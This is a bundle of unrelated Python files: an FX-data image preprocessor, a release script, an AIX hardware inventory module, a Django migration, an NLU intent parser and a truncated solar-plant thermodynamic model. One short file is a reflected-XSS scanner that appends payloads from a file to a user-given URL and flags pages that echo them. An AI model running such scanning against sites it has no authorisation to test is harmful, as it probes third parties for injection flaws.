from PreProcessors.interface import PreProcessorInterface
from Parsers.csv_parser_FX import Parser
import matplotlib.pyplot as plt
import numpy as np
from keras.utils import np_utils
import math
class PreProcessor(PreProcessorInterface):
def __init__(self, filename):
self.__pre_data = []
for file in filename:
self.parser = Parser(file)
self.parser.open()
self.__pre_data += [self.parser.get_data()]
self.parser.close()
self.__train_data_x = None
self.__train_data_y = None
self.__test_data_x = None
self.__test_data_y = None
self.__all_data_x = []
self.__all_data_y = []
self.__train_len = 0
self.__len = 0
self.__ws = 0
def start(self, ws_pred=20, ws_future=7, grade=20):
self.__ws = ws_pred
size = len(self.__pre_data[0])
for i in range(size - ws_pred - ws_future):
matr = self.__matrix_compute(i, ws_pred)
self.__all_data_x.append(np.array(matr))
self.__all_data_y.append(self.__trend_compute(i, ws_pred, ws_future, grade))
self.__len = int(len(self.__all_data_x) * 0.8)
self.__process_train()
self.__process_test()
def __matrix_compute(self, i, j):
matrix = []
for pre_data in self.__pre_data:
matr = np.zeros((j, j))
data = pre_data[i:i + j]
tmp = np.array(data) / np.linalg.norm(np.array(data))
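            # After L2 normalisation each value lies in [-1, 1]; reading it as
            # cos(phi), the entry computed below equals cos(phi_x + phi_y),
            # a Gramian Angular (Summation) Field style encoding of the window.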
for ix, x in enumerate(tmp):
for iy, y in enumerate(tmp):
matr[ix][iy] = x * y - math.sqrt(1 - x * x) * math.sqrt(1 - y * y)
matrix.append(matr)
return matrix
def __trend_compute(self, i, j, k, g=20):
ans = []
for pre_data in self.__pre_data:
delta = pre_data[i+j-1] - pre_data[i+j+k-1]
if delta < -g:
ans.append(0)
elif -g <= delta <= g:
ans.append(1)
elif g < delta:
ans.append(2)
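        # Note: only the trend label derived from the second input series
        # (ans[1]) is returned.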
return ans[1]
@staticmethod
def plt_show(matr):
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
ax.set_aspect('equal')
plt.imshow(matr, interpolation='nearest', cmap=plt.cm.ocean)
plt.colorbar()
plt.show()
def __process_train(self):
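        # Reshape stacked samples to (samples, ws, ws, 3); the hard-coded 3
        # assumes exactly three input files were supplied to the constructor.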
self.__train_data_x = np.array(self.__all_data_x[:self.__len])\
.reshape(self.__len, self.__ws, self.__ws, 3)
self.__train_data_y = np.array(self.__all_data_y[:self.__len])
self.__train_data_y = np_utils.to_categorical(self.__train_data_y, 3)
def __process_test(self):
self.__test_data_x = np.array(self.__all_data_x[self.__len:])\
.reshape(len(self.__all_data_x)-self.__len, self.__ws, self.__ws, 3)
self.__test_data_y = np.array(self.__all_data_y[self.__len:])
self.__test_data_y = np_utils.to_categorical(self.__test_data_y, 3)
def get_train(self):
return self.__train_data_x, self.__train_data_y
def get_test(self):
return self.__test_data_x, self.__test_data_y
def get_all_data(self):
return self.__all_data_x, self.__all_data_y
|
#!/usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (c) 2014-2021, Lars Asplund lars.anders.asplund@gmail.com
"""
Create and validates new tagged release commits
The release process is described in the Contributing section of the web page
"""
import argparse
import json
from urllib.request import urlopen # pylint: disable=no-name-in-module, import-error
import sys
from pathlib import Path
import subprocess
from shutil import which
def main():
"""
Create a new tagged release commit
"""
args = parse_args()
if args.cmd == "create":
version = args.version[0]
major, minor, patch = parse_version(version)
print(f"Attempting to create new release {version!s}")
set_version(version)
validate_new_release(version, pre_tag=True)
make_release_commit(version)
new_version = f"{major:d}.{minor:d}.{patch + 1:d}rc0"
set_version(new_version)
make_next_pre_release_commit(new_version)
elif args.cmd == "validate":
version = get_local_version()
validate_new_release(version, pre_tag=False)
print(f"Release {version!s} is validated for publishing")
def parse_args():
"""
Parse command line arguments
"""
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
create = subparsers.add_parser("create")
create.add_argument("version", nargs=1, help="The version to release")
create.set_defaults(cmd="create")
validate = subparsers.add_parser("validate")
validate.set_defaults(cmd="validate")
return parser.parse_args()
def make_release_commit(version):
"""
Add release notes and make the release commit
"""
run(["git", "add", str(release_note_file_name(version))])
run(["git", "add", str(ABOUT_PY)])
run(["git", "commit", "-m", f"Release {version!s}"])
run(["git", "tag", f"v{version!s}", "-a", "-m", f"release {version!s}"])
def make_next_pre_release_commit(version):
"""
Add release notes and make the release commit
"""
run(["git", "add", str(ABOUT_PY)])
run(["git", "commit", "-m", f"Start of next release candidate {version!s}"])
def validate_new_release(version, pre_tag):
"""
Check that a new release is valid or exit
"""
release_note = release_note_file_name(version)
if not release_note.exists():
print(f"Not releasing version {version!s} since release note {release_note!s} does not exist")
sys.exit(1)
with release_note.open("r") as fptr:
if not fptr.read():
print(f"Not releasing version {version!s} since release note {release_note!s} is empty")
sys.exit(1)
if pre_tag and check_tag(version):
print(f"Not creating new release {version!s} since tag v{version!s} already exist")
sys.exit(1)
if not pre_tag and not check_tag(version):
print(f"Not releasing version {version!s} since tag v{version!s} does not exist")
sys.exit(1)
with urlopen("https://pypi.python.org/pypi/vunit_hdl/json") as fptr:
info = json.load(fptr)
if version in info["releases"].keys():
print(f"Version {version!s} has already been released")
sys.exit(1)
def parse_version(version_str):
"""
Create a 3-element tuple with the major,minor,patch version
"""
return tuple((int(elem) for elem in version_str.split(".")))
def set_version(version):
"""
Update vunit/about.py with correct version
"""
with ABOUT_PY.open("r") as fptr:
content = fptr.read()
print(f"Set local version to {version!s}")
content = content.replace(f'VERSION = "{get_local_version()!s}"', f'VERSION = "{version!s}"')
with ABOUT_PY.open("w") as fptr:
fptr.write(content)
assert get_local_version() == version
def release_note_file_name(version) -> Path:
return REPO_ROOT / "docs" / "release_notes" / (version + ".rst")
def get_local_version():
"""
Return the local python package version and check if corresponding release
notes exist
"""
version = subprocess.check_output([sys.executable, str(REPO_ROOT / "setup.py"), "--version"]).decode().strip()
return version
def check_tag(version):
return "v" + version in set(subprocess.check_output([which("git"), "tag", "--list"]).decode().splitlines())
def run(cmd):
print(subprocess.list2cmdline(cmd))
subprocess.check_call(cmd)
REPO_ROOT = Path(__file__).parent.parent
ABOUT_PY = REPO_ROOT / "vunit" / "about.py"
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
import os
import re
import sys
import time
import psutil
import platform
import subprocess
# Syslog handler
import TeddixLogger
# Config parser
import TeddixConfigFile
# Command output / string parser
import TeddixParser
class TeddixAix:
def __init__(self,syslog):
self.syslog = syslog
self.system = platform.system()
self.arch = platform.architecture()
self.machine = platform.machine()
self.name = 'IBM AIX'
        parser = TeddixParser.TeddixStringParser()
        self.ver = parser.readstdout('oslevel')
self.detail = self.name + self.ver
self.kernel = platform.release()
self.manufacturer= 'IBM'
self.serial = ''
self.syslog.info("Detected: %s (%s) arch: %s" % (self.system,self.kernel,self.machine))
# Get PCI devices
def getpci(self):
self.syslog.debug("Detecting PCI devices " )
parser = TeddixParser.TeddixStringParser()
lines = parser.readstdout('lsdev -p pci0')
pcidev = {}
for i in range(len(lines)):
if parser.strsearch('^([^ ]+)[ ]+\w+[ ]+[^ ]+[ ]+.+',lines[i]):
path = parser.strsearch('^[^ ]+[ ]+\w+[ ]+([^ ]+)[ ]+.+',lines[i])
devtype = parser.strsearch('^[^ ]+[ ]+\w+[ ]+[^ ]+[ ]+(.+)',lines[i])
vendor = ''
model = ''
revision= ''
pcidev[i] = [path,devtype,vendor,model,revision]
return pcidev
# Get Block devices
def getblock(self):
self.syslog.debug("Detecting block devices " )
parser = TeddixParser.TeddixStringParser()
lines = parser.readstdout('lsdev -Ccdisk')
blockdev = {}
for i in range(len(lines)):
if parser.strsearch('^([^ ]+)[ ]+\w+[ ]+.+',lines[i]):
name = parser.strsearch('^([^ ]+)[ ]+\w+[ ]+.+',lines[i])
devtype = parser.strsearch('^[^ ]+[ ]+\w+[ ]+(.+)',lines[i])
vendor = ''
model = ''
nr_sectors = ''
sect_size = ''
rotational = ''
readonly = ''
removable = ''
major = ''
minor = ''
blockdev[i] = [name,devtype,vendor,model,nr_sectors,sect_size,rotational,readonly,removable,major,minor]
return blockdev
# Get installed packages
def getpkgs(self):
self.syslog.debug("Getting package list " )
parser = TeddixParser.TeddixStringParser()
#lslpp -Lc
#Package Name:Fileset:Level:State:PTF Id:Fix State:Type:Description:Destination Dir.:Uninstaller:Message Catalog:Message Set:Message Number:Parent:Automatic:EFIX Locked:Install Path:Build Date
#sudo:sudo-1.6.7p5-2:1.6.7p5-2: : :C:R:Allows restricted root access for specified users.: :/bin/rpm -e sudo: : : : :0: :/opt/freeware:Tue Apr 27 18:35:51 WET 2004
packages = { }
lines = parser.readstdout('lslpp -Lc')
for i in range(len(lines)):
name = parser.strsearch('(.+):.+:.+:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*',lines[i])
ver = parser.strsearch('.+:.+:(.+):.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*:.*',lines[i])
pkgsize = ''
instalsize = ''
section = ''
status = ''
info = parser.strsearch('.+:.+:.+:.*:.*:.*:.*:(.*):.*:.*:.*:.*:.*:.*:.*:.*:.*:.*',lines[i])
homepage = ''
signed = ''
files = ''
arch = ''
publisher = ''
release = ''
packages[i] = [name,ver,pkgsize,instalsize,section,status,info,homepage,signed,files,arch]
return packages
# Get updates
def getupdates(self):
self.syslog.debug("Listing available updates")
parser = TeddixParser.TeddixStringParser()
# suma -x -a Action=Preview
updates = { }
return updates
# Get partitions
def getpartitions(self):
self.syslog.debug("Getting filesystem list ")
parser = TeddixParser.TeddixStringParser()
# no support from psutil
disks = { }
output = parser.readstdout('df')
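        # Assumed AIX `df` column layout: Filesystem, 512-blocks, Free, %Used,
        # Iused, %Iused, Mounted on; the regexes below pick out device, total,
        # free, %used and mount point.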
lines = parser.arrayfilter('^([^ ]+)[ ]+[\d\-]+[ ]+[\d\-]+[ ]+[\d\%\-]+[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+.+',output)
for i in range(len(lines)):
fstotal = parser.strsearch('^[^ ]+[ ]+([\d\-]+)[ ]+[\d\-]+[ ]+[\d\%\-]+[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+.+',lines[i])
fsfree = parser.strsearch('^[^ ]+[ ]+[\d\-]+[ ]+([\d\-]+)[ ]+[\d\%\-]+[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+.+',lines[i])
fsused = unicode(parser.str2int(fstotal) - parser.str2int(fsfree))
fspercent = parser.strsearch('^[^ ]+[ ]+[\d\-]+[ ]+[\d\-]+[ ]+([\d\%\-]+)[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+.+',lines[i])
fsdev = parser.strsearch('^([^ ]+)[ ]+[\d\-]+[ ]+[\d\-]+[ ]+[\d\%\-]+[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+.+',lines[i])
fsmount = parser.strsearch('^[^ ]+[ ]+[\d\-]+[ ]+[\d\-]+[ ]+[\d\%\-]+[ ]+[\d\-]+[ ]+[\d\-\%]+[ ]+(.+)',lines[i])
fstype = ''
fsopts = ''
disks[i] = [fsdev,fsmount,fstype,fsopts,fstotal,fsused,fsfree,fspercent]
return disks
# Get swap
def getswap(self):
self.syslog.debug("Reading swap filesystems")
parser = TeddixParser.TeddixStringParser()
output = parser.readstdout('lsps -ac')
lines = parser.arrayfilter('.*:(.*):.*:.*:.*:.*:.*:.*',output)
swaps = { }
for i in range(len(lines)):
dev = parser.strsearch('.*:(.*):.*:.*:.*:.*:.*:.*',lines[i])
swaptype = parser.strsearch('.*:.*:.*:.*:.*:.*:.*:(.*)',lines[i])
total = parser.strsearch('.*:.*:.*:(.*):.*:.*:.*:.*',lines[i])
used = ''
free = ''
swaps[i] = [dev,swaptype,total,used,free]
return swaps
# Get network interfaces
def getnics(self):
self.syslog.debug("Looking for available network interfaces ")
parser = TeddixParser.TeddixStringParser()
lines = parser.readstdout('lsdev -Cc if')
nics = {}
for i in range(len(lines)):
name = parser.strsearch('^([^ ]+)[ ]+\w+[ ]+[^ ]+',lines[i])
lines2 = parser.readstdout("entstat -d " + name)
macaddr = parser.arraysearch('Hardware Address: ([\w:.-]+)',lines2)
description = parser.strsearch('^[^ ]+[ ]+\w+[ ]+([^ ]+)',lines[i])
status = parser.strsearch('^[^ ]+[ ]+(\w+)[ ]+[^ ]+',lines[i])
# TODO:
rx_packets = ''
rx_bytes = ''
tx_packets = ''
tx_bytes = ''
driver = ''
kernmodule = ''
drvver = ''
nictype = ''
driver = ''
firmware = ''
nics[i] = [name,description,nictype,status,rx_packets,tx_packets,rx_bytes,tx_bytes,driver,drvver,firmware,kernmodule,macaddr]
return nics
# Get ipv4 address
def getip(self,nic):
self.syslog.debug("Reading %s IPv4 configuraion" % nic)
parser = TeddixParser.TeddixStringParser()
lines = parser.readstdout("lsattr -El " + nic)
        ipv4 = parser.arraysearch('netaddr[ ]+(\d+\.\d+\.\d+\.\d+)[ ]+',lines)
        mask = parser.arraysearch('netmask[ ]+(\d+\.\d+\.\d+\.\d+)[ ]+',lines)
bcast = ''
ips = { }
ips[0] = [ipv4,mask,bcast]
return ips
# Get ipv6 address
def getip6(self,nic):
self.syslog.debug("Reading %s IPv6 configuraion" % nic)
parser = TeddixParser.TeddixStringParser()
lines = parser.readstdout("lsattr -El " + nic)
        ipv6 = parser.arraysearch('netaddr6[ ]+([0-9a-fA-F:]+)[ ]+',lines)
        mask = parser.arraysearch('prefixlen[ ]+(\d+)[ ]+',lines)
        bcast = ''
        ips6 = { }
        ips6[0] = [ipv6,mask,bcast]
return ips6
# Get dnsservers
def getdns(self):
self.syslog.debug("Reading DNS configuration")
parser = TeddixParser.TeddixStringParser()
lines = parser.readlines('/etc/resolv.conf')
i = 0
j = 0
dns = { }
for i in range(len(lines)):
nameserver = parser.strsearch('^nameserver[ \t]+(.+)',lines[i])
domain = parser.strsearch('^domain[ \t]+(.+)',lines[i])
search = parser.strsearch('^search[ \t]+(.+)',lines[i])
if nameserver:
dns[j] = ['nameserver',nameserver]
j += 1
elif domain:
dns[j] = ['domain',domain]
j += 1
elif search:
dns[j] = ['search',search]
j += 1
i += 1
return dns
# Get routes
def getroutes(self):
self.syslog.debug("Reading routing table for ipv4 ")
parser = TeddixParser.TeddixStringParser()
output = parser.readstdout("netstat -rn -f inet")
lines = parser.arrayfilter('^(.+)[ ]+[\d\.]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',output)
routes = { }
for i in range(len(lines)):
destination = parser.strsearch('^(.+)[ ]+[\d\.]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
mask = ''
gateway = parser.strsearch('^.+[ ]+([\d\.])+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
interface = parser.strsearch('^.+[ ]+[\d\.]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+([^ ]+)[ ]+',lines[i])
flags = parser.strsearch('^.+[ ]+[\d\.]+[ ]+(\w+)[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
metric = ''
routes[i] = [destination,gateway,mask,flags,metric,interface]
i += 1
return routes
# Get routes
def getroutes6(self):
self.syslog.debug("Reading routing tables for ipv6 ")
parser = TeddixParser.TeddixStringParser()
output = parser.readstdout("netstat -rn -f inet6")
lines = parser.arrayfilter('^([:a-zA-Z\d]+)[ ]+[:a-zA-Z\d]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',output)
routes6 = { }
for i in range(len(lines)):
destination = parser.strsearch('^([:a-zA-Z\d]+)[ ]+[:a-zA-Z\d]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
mask = ''
gateway = parser.strsearch('^[:a-zA-Z\d]+[ ]+([:a-zA-Z\d]+)[ ]+\w+[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
interface = parser.strsearch('^[:a-zA-Z\d]+[ ]+[:a-zA-Z\d]+[ ]+\w+[ ]+\d+[ ]+\d+[ ]+([^ ]+)[ ]+',lines[i])
flags = parser.strsearch('^[:a-zA-Z\d]+[ ]+[:a-zA-Z\d]+[ ]+(\w+)[ ]+\d+[ ]+\d+[ ]+[^ ]+[ ]+',lines[i])
metric = ''
routes6[i] = [destination,gateway,mask,flags,metric,interface]
return routes6
# Get groups
def getgroups(self):
self.syslog.debug("Reading system groups")
parser = TeddixParser.TeddixStringParser()
return {}
# Get users
def getusers(self):
self.syslog.debug("Reading system users")
parser = TeddixParser.TeddixStringParser()
return {}
# Get procs
def getprocs(self):
self.syslog.debug("Listing system procs")
parser = TeddixParser.TeddixStringParser()
return {}
# Get services
def getsvcs(self):
self.syslog.debug("Getting system services")
parser = TeddixParser.TeddixStringParser()
return {}
|
import requests
import color
from color import *
def xss():
fname = "payloads.txt"
with open(fname) as f:
content = f.readlines()
payloads = [x.strip() for x in content]
print(T + "Works best if there is a query at the end. eg. http://example.com?search=" + W)
url = input(''+T+'' + color.UNDERLINE + 'Full URL> ' + color.END)
vuln = []
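    # Append each payload verbatim to the URL and flag it as vulnerable when
    # the payload is reflected in the response body.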
    for payload in payloads:
        xss_url = url + payload
r = requests.get(xss_url)
if payload.lower() in r.text.lower():
print(G + "[+] Vulnerable: " + W + payload)
if(payload not in vuln):
vuln.append(payload)
else:
print(R + "[!] Not vulnerable!" + W)
print("--------------------\n" + G + "Available Payloads:" + W)
print('\n'.join(vuln))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2018-07-09 18:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('orgManager', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='I_Organization',
new_name='Organization',
),
]
|
from __future__ import print_function, absolute_import
from abc import ABCMeta, abstractmethod
from builtins import object
from pathlib import Path
from future.utils import with_metaclass
from snips_nlu.constants import UTTERANCES, SLOT_NAME, ENTITY, TEXT, DATA
INTENT_FORMATTING_ERROR = AssertionError(
"Intent file is not properly formatted")
class IntentDataset(object):
"""Dataset of an intent
Can parse utterances from a text file or an iterator.
An example of utterance is:
"the [role:role](president) of [country:country](France)"
a Tag is in this format:
[slot:entity_name](text_to_tag)
Attributes:
intent_name (str): name of the intent
utterances (list of :class:`.IntentUtterance`): intent utterances
"""
def __init__(self, intent_name):
self.intent_name = intent_name
self.utterances = []
@classmethod
def from_file(cls, filepath):
filepath = Path(filepath)
stem = filepath.stem
if not stem.startswith("intent_"):
raise AssertionError("Intent filename should start with 'intent_' "
"but found: %s" % stem)
intent_name = stem[7:]
if not intent_name:
raise AssertionError("Intent name must not be empty")
with filepath.open(encoding="utf-8") as f:
lines = iter(l.strip() for l in f if l.strip())
return cls.from_iter(intent_name, lines)
@classmethod
def from_iter(cls, intent_name, samples_iter):
"""Generates a dataset from an iterator of samples"""
dataset = cls(intent_name)
for sample in samples_iter:
utterance = IntentUtterance.parse(sample)
dataset.add(utterance)
return dataset
def add(self, utterance):
"""Adds an :class:`.IntentUtterance` to the dataset"""
self.utterances.append(utterance)
@property
def json(self):
"""Intent dataset in json format"""
return {
UTTERANCES: [
{DATA: [chunk.json for chunk in utterance.chunks]}
for utterance in self.utterances
]
}
@property
def entities_names(self):
"""Set of entity names present in the intent dataset"""
return set(chunk.entity for u in self.utterances
for chunk in u.chunks if isinstance(chunk, SlotChunk))
class IntentUtterance(object):
def __init__(self, input, chunks):
self.input = input
self.chunks = chunks
@property
def annotated(self):
"""Annotates with *
Returns: The sentence annotated just with stars
Examples:
>>> from snips_nlu.cli.dataset.intent_dataset import \
IntentUtterance
>>> p = "the [role:role](president) of [country:country](France)"
>>> u = IntentUtterance.parse(p)
>>> u.annotated
'the *president* of *France*'
"""
binput = bytearray(self.input, 'utf-8')
acc = 0
star = ord('*')
for chunk in self.chunks:
if isinstance(chunk, SlotChunk):
binput.insert(chunk.range.start + acc, star)
binput.insert(chunk.range.end + acc + 1, star)
acc += 2
return binput.decode('utf-8')
@staticmethod
def stripped(input, chunks):
acc = 0
s = ''
new_chunks = []
for chunk in chunks:
start = chunk.range.start
end = chunk.range.end
s += input[start:end]
if isinstance(chunk, SlotChunk):
acc += chunk.tag_range.size
rng = Range(start - acc, end - acc)
new_chunk = SlotChunk(chunk.name, chunk.entity, rng,
chunk.text, chunk.tag_range)
new_chunks.append(new_chunk)
acc += 1
else:
rng = Range(start - acc, end - acc)
new_chunks.append(TextChunk(chunk.text, rng))
return s, new_chunks
@staticmethod
def parse(string):
"""Parses an utterance
Args:
string (str): an utterance in the class:`.Utterance` format
Examples:
>>> from snips_nlu.cli.dataset.intent_dataset import \
IntentUtterance
>>> u = IntentUtterance.\
parse("president of [country:default](France)")
>>> len(u.chunks)
2
>>> u.chunks[0].text
'president of '
>>> u.chunks[0].range.start
0
>>> u.chunks[0].range.end
13
"""
sm = SM(string)
capture_text(sm)
string, chunks = IntentUtterance.stripped(string, sm.chunks)
return IntentUtterance(string, chunks)
class Chunk(with_metaclass(ABCMeta, object)):
def __init__(self, text, range):
self.text = text
self.range = range
@abstractmethod
def json(self):
pass
class SlotChunk(Chunk):
def __init__(self, slot_name, entity, range, text, tag_range):
super(SlotChunk, self).__init__(text, range)
self.name = slot_name
self.entity = entity
self.tag_range = tag_range
@property
def json(self):
return {
TEXT: self.text,
SLOT_NAME: self.name,
ENTITY: self.entity,
}
class TextChunk(Chunk):
@property
def json(self):
return {
TEXT: self.text
}
class Range(object):
def __init__(self, start, end=None):
self.start = start
self.end = end
@property
def size(self):
return self.end - self.start + 1
class SM(object):
"""State Machine for parsing"""
def __init__(self, input):
self.input = input
self.chunks = []
self.current = 0
def add_slot(self, slot_start, name, entity):
"""Adds a named slot
Args:
slot_start (int): position where the slot tag started
name (str): slot name
entity (str): entity name
"""
tag_range = Range(slot_start - 1)
chunk = SlotChunk(slot_name=name, entity=entity, range=None, text=None,
tag_range=tag_range)
self.chunks.append(chunk)
def add_text(self, text):
"""Adds a simple text chunk using the current position"""
start = self.current
end = start + len(text)
chunk = TextChunk(text=text, range=Range(start=start, end=end))
self.chunks.append(chunk)
def add_tagged(self, text):
"""Adds text to the last slot"""
if not self.chunks:
raise AssertionError("Cannot add tagged text because chunks list "
"is empty")
chunk = self.chunks[-1]
chunk.text = text
chunk.tag_range.end = self.current - 1
chunk.range = Range(start=self.current, end=self.current + len(text))
def find(self, s):
return self.input.find(s, self.current)
def move(self, pos):
"""Moves the cursor of the state to position after given
Args:
pos (int): position to place the cursor just after
"""
self.current = pos + 1
def peek(self):
return self[0]
def read(self):
c = self[0]
self.current += 1
return c
def __getitem__(self, key):
current = self.current
if isinstance(key, int):
return self.input[current + key]
elif isinstance(key, slice):
start = current + key.start if key.start else current
return self.input[slice(start, key.stop, key.step)]
else:
raise TypeError("Bad key type: %s" % type(key))
def capture_text(state):
next_pos = state.find('[')
sub = state[:] if next_pos < 0 else state[:next_pos]
if sub.strip():
state.add_text(sub)
if next_pos >= 0:
state.move(next_pos)
capture_slot(state)
def capture_slot(state):
slot_start = state.current
next_pos = state.find(':')
if next_pos < 0:
raise INTENT_FORMATTING_ERROR
else:
slot_name = state[:next_pos]
state.move(next_pos)
next_pos = state.find(']')
if next_pos < 0:
raise INTENT_FORMATTING_ERROR
entity = state[:next_pos]
state.move(next_pos)
state.add_slot(slot_start, slot_name, entity)
if state.read() != '(':
raise INTENT_FORMATTING_ERROR
capture_tagged(state)
def capture_tagged(state):
next_pos = state.find(')')
if next_pos < 1:
raise INTENT_FORMATTING_ERROR
else:
tagged_text = state[:next_pos]
state.add_tagged(tagged_text)
state.move(next_pos)
capture_text(state)
|
# -*- coding: utf-8 -*-
from tespy.networks import Network
from tespy.components import (
Sink, Source, Turbine, Condenser, Pump, Merge, Splitter,
Valve, HeatExchanger, ParabolicTrough, CycleCloser, Compressor, Drum)
from tespy.connections import Connection, Bus, Ref
from tespy.tools import CharLine
from tespy.tools import document_model
import pandas as pd
import numpy as np
from tespy.tools import ExergyAnalysis
import plotly.graph_objects as go
# specification of ambient state
pamb = 1.013
Tamb = 25
# setting up network
SEGSvi = Network(fluids=['water', 'INCOMP::TVP1', 'air'])
SEGSvi.set_attr(T_unit='C', p_unit='bar', h_unit='kJ / kg',
m_unit='kg / s', s_unit="kJ / kgK")
# components definition
air_in = Source('Ambient air source', fkt_group='CW')
air_out = Sink('Ambient air sink', fkt_group='CW')
closer_pt = CycleCloser('Cycle closer pt', fkt_group='SF')
pt = ParabolicTrough('Parabolic trough', fkt_group='SF')
ptpump = Pump('HTF pump', fkt_group='SF')
closer = CycleCloser('Cycle closer power cycle', fkt_group='SG')
eco = HeatExchanger('Economizer', fkt_group='SG')
eva = HeatExchanger('Evaporator', fkt_group='SG')
sup = HeatExchanger('Superheater', fkt_group='SG')
drum = Drum('Drum', fkt_group='SG')
reh = HeatExchanger('Reheater', fkt_group='RH')
hpt1 = Turbine('HP turbine 1', fkt_group='HPT')
hpt2 = Turbine('HP turbine 2', fkt_group='HPT')
lpt1 = Turbine('LP turbine 1', fkt_group='LPT')
lpt2 = Turbine('LP turbine 2', fkt_group='LPT')
lpt3 = Turbine('LP turbine 3', fkt_group='LPT')
lpt4 = Turbine('LP turbine 4', fkt_group='LPT')
lpt5 = Turbine('LP turbine 5', fkt_group='LPT')
cond = Condenser('Condenser', fkt_group='CW')
condpump = Pump('Condenser pump', fkt_group='CW')
fwt = Merge('Feedwater tank', num_in=3, fkt_group='LPP')
fwp = Pump('Feedwater pump', fkt_group='FWP')
cwp = Pump('Cooling water pump', fkt_group='CW')
closer_cw = CycleCloser('Cycle closer cw', fkt_group='CW')
ct = HeatExchanger('Cooling tower', fkt_group='CW')
fan = Compressor('Cooling tower fan', fkt_group='CW')
sp1 = Splitter('Splitter 1', fkt_group='HPT')
sp2 = Splitter('Splitter 2', fkt_group='HPT')
sp3 = Splitter('Splitter 3', fkt_group='LPT')
sp4 = Splitter('Splitter 4', fkt_group='LPT')
sp5 = Splitter('Splitter 5', fkt_group='LPT')
sp6 = Splitter('Splitter 6', fkt_group='LPT')
sp7 = Splitter('Splitter 7', fkt_group='SF')
m1 = Merge('Merge 1', fkt_group='CW')
m2 = Merge('Merge 2', fkt_group='HPP')
m3 = Merge('Merge 3', fkt_group='LPP')
m4 = Merge('Merge 4', fkt_group='LPP')
m5 = Merge('Merge 5', fkt_group='SF')
v1 = Valve('Valve 1', fkt_group='HPP')
v2 = Valve('Valve 2', fkt_group='HPP')
v3 = Valve('Valve 3', fkt_group='LPP')
v4 = Valve('Valve 4', fkt_group='LPP')
v5 = Valve('Valve 5', fkt_group='LPP')
hppre1 = Condenser('High pressure preheater 1', fkt_group='HPP')
hppre2 = Condenser('High pressure preheater 2', fkt_group='HPP')
hppre1_sub = HeatExchanger('High pressure preheater 1 subcooling', fkt_group='HPP')
hppre2_sub = HeatExchanger('High pressure preheater 2 subcooling', fkt_group='HPP')
lppre1 = Condenser('Low pressure preheater 1', fkt_group='LPP')
lppre2 = Condenser('Low pressure preheater 2', fkt_group='LPP')
lppre3 = Condenser('Low pressure preheater 3', fkt_group='LPP')
lppre1_sub = HeatExchanger('Low pressure preheater 1 subcooling', fkt_group='LPP')
lppre2_sub = HeatExchanger('Low pressure preheater 2 subcooling', fkt_group='LPP')
lppre3_sub = HeatExchanger('Low pressure preheater 3 subcooling', fkt_group='LPP')
# connections definition
# power cycle
c1 = Connection(sup, 'out2', closer, 'in1', label='1')
c2 = Connection(closer, 'out1', hpt1, 'in1', label='2')
c3 = Connection(hpt1, 'out1', sp1, 'in1', label='3')
c4 = Connection(sp1, 'out1', hpt2, 'in1', label='4')
c5 = Connection(hpt2, 'out1', sp2, 'in1', label='5')
c6 = Connection(sp2, 'out1', reh, 'in2', label='6')
c7 = Connection(reh, 'out2', lpt1, 'in1', label='7')
c8 = Connection(lpt1, 'out1', sp3, 'in1', label='8')
c9 = Connection(sp3, 'out1', lpt2, 'in1', label='9')
c10 = Connection(lpt2, 'out1', sp4, 'in1', label='10')
c11 = Connection(sp4, 'out1', lpt3, 'in1', label='11')
c12 = Connection(lpt3, 'out1', sp5, 'in1', label='12')
c13 = Connection(sp5, 'out1', lpt4, 'in1', label='13')
c14 = Connection(lpt4, 'out1', sp6, 'in1', label='14')
c15 = Connection(sp6, 'out1', lpt5, 'in1', label='15')
c16 = Connection(lpt5, 'out1', m1, 'in1', label='16')
c17 = Connection(m1, 'out1', cond, 'in1', label='17')
c18 = Connection(cond, 'out1', condpump, 'in1', label='18')
c19 = Connection(condpump, 'out1', lppre1, 'in2', label='19')
# c19 = Connection(condpump, 'out1', lppre1_sub, 'in2', label='19')
# c20 = Connection(lppre1_sub, 'out2', lppre1, 'in2', label='20')
c21 = Connection(lppre1, 'out2', lppre2, 'in2', label='21')
# c21 = Connection(lppre1, 'out2', lppre2_sub, 'in2', label='21')
# c22 = Connection(lppre2_sub, 'out2', lppre2, 'in2', label='22')
c23 = Connection(lppre2, 'out2', lppre3, 'in2', label='23')
# c23 = Connection(lppre2, 'out2', lppre3_sub, 'in2', label='23')
# c24 = Connection(lppre3_sub, 'out2', lppre3, 'in2', label='24')
c25 = Connection(lppre3, 'out2', fwt, 'in1', label='25')
c26 = Connection(fwt, 'out1', fwp, 'in1', label='26')
c27 = Connection(fwp, 'out1', hppre1, 'in2', label='27')
c29 = Connection(hppre1, 'out2', hppre2, 'in2', label='29')
c31 = Connection(hppre2, 'out2', eco, 'in2', label='31')
c36 = Connection(sp1, 'out2', hppre2, 'in1', label='36')
c37 = Connection(hppre2, 'out1', v1, 'in1', label='37')
c39 = Connection(v1, 'out1', m2, 'in2', label='39')
c40 = Connection(sp2, 'out2', m2, 'in1', label='40')
